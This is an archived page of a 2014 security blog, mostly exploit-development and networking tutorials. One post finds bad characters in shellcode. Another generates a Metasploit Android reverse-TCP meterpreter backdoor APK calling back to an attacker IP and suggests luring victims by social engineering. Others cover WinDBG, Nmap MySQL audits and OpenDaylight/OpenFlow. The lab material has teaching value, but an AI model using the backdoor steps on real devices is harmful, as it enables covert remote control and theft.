Friday, April 18, 2014

Exploitation: Identifying Bad Characters in a Shellcode

Characters which breaks the execution of a Shell code might be considered as Bad Characters.

Before delving deep, we should understand what Shellcode is
http://en.wikipedia.org/wiki/Shellcode

To find out what are the bad characters for the specific application which we are trying to exploit, generate a byte array between 0x00 and 0xff which can be done using Immunity Debugger
!mona bytearray

Copy the generated Byte Array as part of the shell code i.e. after the NOP (\x90) sled. Exploit the Vulnerable application and at the time of crash see the alignment of the Byte Array. If there is an alignment issue at some byte or some missing byte between 0x00 and 0xff is the Bad Characters. Once we find the  Bad Character remove the character from the byte array and try to exploit the application with new shellcode. Repeat the step till 0xff is reached.

Common Bad Characters
0x00    NULL (\0)
0x09     Tab (\t)
0x0a     Line Feed (\n)
0x0d    Carriage Return (\r)
0xff      Form Feed (\f)

Wrote small program to generate Hex Numbers
******************************************
 root@kali-arpman:~# cat hex_numbers.c
#include //use stdio.h and stdlib.h, some html embedding issue
#include

void main()
{
    int x=0,i;

    printf("disects: Generate 0x00 to 0xff Hex Numbers\n");
    for(i = 0;i<=255; i++)
    {
        if(i%8 == 0 && i>=8)
            printf("\n");

        printf("%#.2x  ", i);
    }

    printf("\n");
}
root@kali-arpman:~# gcc hex_numbers.c -o hex_numbers
root@kali-arpman:~#
root@kali-arpman:~#
root@kali-arpman:~# ./hex_numbers
disects: Generate 0x00 to 0xff Hex Numbers
00  0x01  0x02  0x03  0x04  0x05  0x06  0x07
0x08  0x09  0x0a  0x0b  0x0c  0x0d  0x0e  0x0f
0x10  0x11  0x12  0x13  0x14  0x15  0x16  0x17
0x18  0x19  0x1a  0x1b  0x1c  0x1d  0x1e  0x1f
0x20  0x21  0x22  0x23  0x24  0x25  0x26  0x27
0x28  0x29  0x2a  0x2b  0x2c  0x2d  0x2e  0x2f
0x30  0x31  0x32  0x33  0x34  0x35  0x36  0x37
0x38  0x39  0x3a  0x3b  0x3c  0x3d  0x3e  0x3f
0x40  0x41  0x42  0x43  0x44  0x45  0x46  0x47
0x48  0x49  0x4a  0x4b  0x4c  0x4d  0x4e  0x4f
0x50  0x51  0x52  0x53  0x54  0x55  0x56  0x57
0x58  0x59  0x5a  0x5b  0x5c  0x5d  0x5e  0x5f
0x60  0x61  0x62  0x63  0x64  0x65  0x66  0x67
0x68  0x69  0x6a  0x6b  0x6c  0x6d  0x6e  0x6f
0x70  0x71  0x72  0x73  0x74  0x75  0x76  0x77
0x78  0x79  0x7a  0x7b  0x7c  0x7d  0x7e  0x7f
0x80  0x81  0x82  0x83  0x84  0x85  0x86  0x87
0x88  0x89  0x8a  0x8b  0x8c  0x8d  0x8e  0x8f
0x90  0x91  0x92  0x93  0x94  0x95  0x96  0x97
0x98  0x99  0x9a  0x9b  0x9c  0x9d  0x9e  0x9f
0xa0  0xa1  0xa2  0xa3  0xa4  0xa5  0xa6  0xa7
0xa8  0xa9  0xaa  0xab  0xac  0xad  0xae  0xaf
0xb0  0xb1  0xb2  0xb3  0xb4  0xb5  0xb6  0xb7
0xb8  0xb9  0xba  0xbb  0xbc  0xbd  0xbe  0xbf
0xc0  0xc1  0xc2  0xc3  0xc4  0xc5  0xc6  0xc7
0xc8  0xc9  0xca  0xcb  0xcc  0xcd  0xce  0xcf
0xd0  0xd1  0xd2  0xd3  0xd4  0xd5  0xd6  0xd7
0xd8  0xd9  0xda  0xdb  0xdc  0xdd  0xde  0xdf
0xe0  0xe1  0xe2  0xe3  0xe4  0xe5  0xe6  0xe7
0xe8  0xe9  0xea  0xeb  0xec  0xed  0xee  0xef
0xf0  0xf1  0xf2  0xf3  0xf4  0xf5  0xf6  0xf7
0xf8  0xf9  0xfa  0xfb  0xfc  0xfd  0xfe  0xff
root@kali-arpman:~#

******************************************

http://seclists.org/basics/2011/Mar/77
http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads

Other interesting posts on the blog
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2014/04/nmap-scripting-engine-auditing-mysql.html

Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access into Android devices. I am using Nexux 7 Tablet as Victim.

SETUP DESCRIPTION
192.168.1.102 Victims IP Address (Android Nexus 7 Tablet)
192.168.1.140 Attackers IP Address (Metasploit)

I am using AirDroid App on Nexus 7 to download Metasploit backdoor (say, malicious App). In real scenarios we can host Web server with malicious app and entice users to install the app using various Social Engineering techniques.

BACKDOOR CREATION
Using Kali Linux with Metasploit Framework installed to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload Metasploit command to create payloads (exe, java, apk etc.)
LHOST (local host) Attackers IP address for victim to connect back
LPORT (local port) port for victim to connect back
R msfpayload parameter indicates generation of raw payload
APK Application Package file

Successful execution of msfpayload will create andr_bd.apk App which is a Metasploit reverse TCP backdoor. When the app is installed on any android device, it will connect back to attackers IP address (192.168.1.140 here). Copy the App to Nexus 7 Tablet using AirDroid, install the app, successful installation will show the screen shot given below.

Before installing the App on Nexus 7 attacker need to run the following Metasploit commands for successful connection back of victim’s machine to attacker’s machine.
$ msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit 

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file
0:017> .hh

Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |
Unassemble Function or address 0:017> uf mshtml!CElement::Doc 0:017> u address Assemble Address 0:017> a address Stack Trace 0:017> knL

Display Stack Backtrace
0:017> k
Trace (t) command executes a single instruction or source line and optionally displays the resulting values of all registers and flags. 0:017> t

Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

dll is loaded between 03b10000 and 03fd000, search this area for 5d c3
0:014> s 03b10000 l 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the
application/thread may not have exception handling at all.
Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data types(structures and unions). 
0:017> dt var1

array(arr1) under var1
0:017> dt var1 -a arr1

displays all types and globals under nt
0:017> dt nt!*

Looking at the default process heap, shows percentage of busy blocks
0:017> !heap -stat -h 00150000

Listing allocations with specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10
0:017> d esp
To which heap entry a particular address (here, 0c0c0c0c) belongs to 0:017> !heap -p -a 0c0c0c0c

Refer blow link for further reference
http://windbg.info/doc/1-common-cmds.html

Thursday, April 3, 2014

Nmap Scripting Engine: Auditing MySQL Server

Nmap is an Open Source tool for Network Mapping, Network Inventory and Security Auditing. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
 
MySQL is an Open Source Relational Data Base Management Systems (RDBMS).
 
I am using Nmap TCP SYN scan to find all open ports.
 
Nmap Scripts are located at
/usr/share/nmap/scripts
on Kali Linux.
 
Below snapshot shows the scripts we used to audit MySQL Server. Nmap Script disclose critical information like username, usernames without password. cersion, dump of hashes etc.

 
To run all the scripts related to MySQL execute below command.
# nmap --script "mysql-*" target_ip
 
From the above snapshots replace 127.0.0.1 with the IP you want to scan/audit.
 

Wednesday, March 26, 2014

Opendaylight (ODL) Controller Debugging using OSGI Commands


Most of the commands will work with CPqD Switch, there are some limitations/bugs with OVSK.
Few commands work for openflowplugin and few for controller.

removeMeter
removeMeters
addMeter
addMeters
modifyMeter
modifyMeters
removeGroup
addGroup
modifyGroup
portDescStats
flowStats

tableStats
groupStats
meterStats
meterConfigStats
aggregateStats
descStats
addMDFlow

modifyMDFlow
removeMDFlow

startSync
addFlows
modifyFlows
removeFlows
modifyTable
addGroups
modifyGroups
removeGroups
tbegin

tcommit
trollback
cacheinfo
setLogLevel
getLogLevel
create
destroy
listen
unlisten
myController
getClusterNodes
listcaches
put
remove
dumper
get
listenActive
unlistenActive
putComplex
updateComplex
printUserLink
addUserLink
deleteUserLink
printNodeEdges
readflows
readflow
readports
readport
readtable
readdescr
modifyflow
removeflow
addflowv6
removeflowv6
umAddUser
umRemUser
umGetUsers
addAAAServer
removeAAAServer
printAAAServers
ofdumpstatsmgr
resetSwitchCapability
ofbw
txratewindow
ofstatsmgrintervals
prlh
prll
psl
pht
pet
ptick
pcc
ptm
psize
page
sage
eage
dage
scc
ecc
dcc
psnp
esnp
dsnp
spause
sdi
sports
addsw
remsw
pthrot
ethrot
dthrot
pem
bwfactor
px2r
px2rc
controllerShowQueueSize
controllerShowSwitches
controllerReset
controllerShowConnConfig
dumpPendingARPReqList
dumpFailedARPReqList
pencs
pdm
psc
pfc
psd
psp
psm
addContainer
createContainer
removeContainer
addContainerEntry
removeContainerEntry
addContainerFlow
removeContainerFlow
containermgrGetRoles
containermgrGetAuthorizedGroups
containermgrGetAuthorizedResources
containermgrGetResourcesForGroup
containermgrGetUserLevel
containermgrGetUserResources
saveConfig
api3ut
scheme


printNodes




Tuesday, March 25, 2014

OpenFlow 1.3 Protocol Packet Structure: OFPT_HELLO

OpenFlow protocol is used for communication between ODL Controller and Switches supporting OpenFlow (OVSK, CPqD, Cisco Switches(N3K, Cat3K etc.), Brocade, HP, Juniper etc.). Each OpenFlow message begins with OpenFlow header which has Version(0x04, 1 byte), Type(1 byte), length(2 bytes), transaction ID (4 bytes). In OF1.3 we have 30 different types of Messages which start with OFPT_

192.168.56.103        Controller
192.168.56.104        Mininet (OVSK)
192.168.56.102         Mininet (CPqD)



If Protocol field is seen as TCP instead of OpenFlow, right click on the packet of interest -> Decode As -> Transport tab -> select Openflow -> OK

Monday, March 24, 2014

SDN Opendaylight Controller: Add/Remove Flow Entries using REST


Start Controller
$ ./run.sh

Start Open vSwitches using Mininet
$ sudo mn --topo single,2 --controller remote,ip=192.168.56.101 --switch ovsk,protocols=OpenFlow13


192.168.56.101     Virtual Machine (VM) where Opendaylight(ODL) Controller is running
192.168.56.102     VM where Mininet is running

We will be using f206.xml for our testing.

Before using REST request Click on Basic Auth tab and configure username/password as admin/admin which are default credentials for accessing Controller GUI, click Refresh Headers. And configure Content-Type and Accept as shown below

To add a Flow Entry on to OpenvSwitch need to use PUT request method.

table_id, id tags of the XML will be part of REST request URL

http://192.168.56.101:8080/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/2/flow/133

Select raw-> XML as data format and copy f206.xml to the text body and click on Send tab. It should return us "200 OK" status code which indicates Flow is successfully sent to Controller without any issues, and the information will be saved in Controllers cache(Configuration Data Store).



Flow being successfully sent to Switch or not can be verified using ovs-ofctl command.

To remove a flow from Switch using REST request use DELETE request instead of PUT.

Following articles might be of interested
SDN Opendaylight Controller: Add/Remove Flow Entries using OSGI CLI
http://blog.disects.com/2014/03/sdn-opendaylight-controller-addremove_24.html

ovs-ofctl OVS action commands for OpenFlow 1.3
http://blog.disects.com/2014/01/ovs-ofctl-ovs-action-commands-for.html

ovs-ofctl commands on OpenFlow 1.3 Mininet Open vSwitch (OVSK)
http://blog.disects.com/2014/01/ovs-ofctl-commands-on-openflow-13.html 

Interested in Ethical Hacking!
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html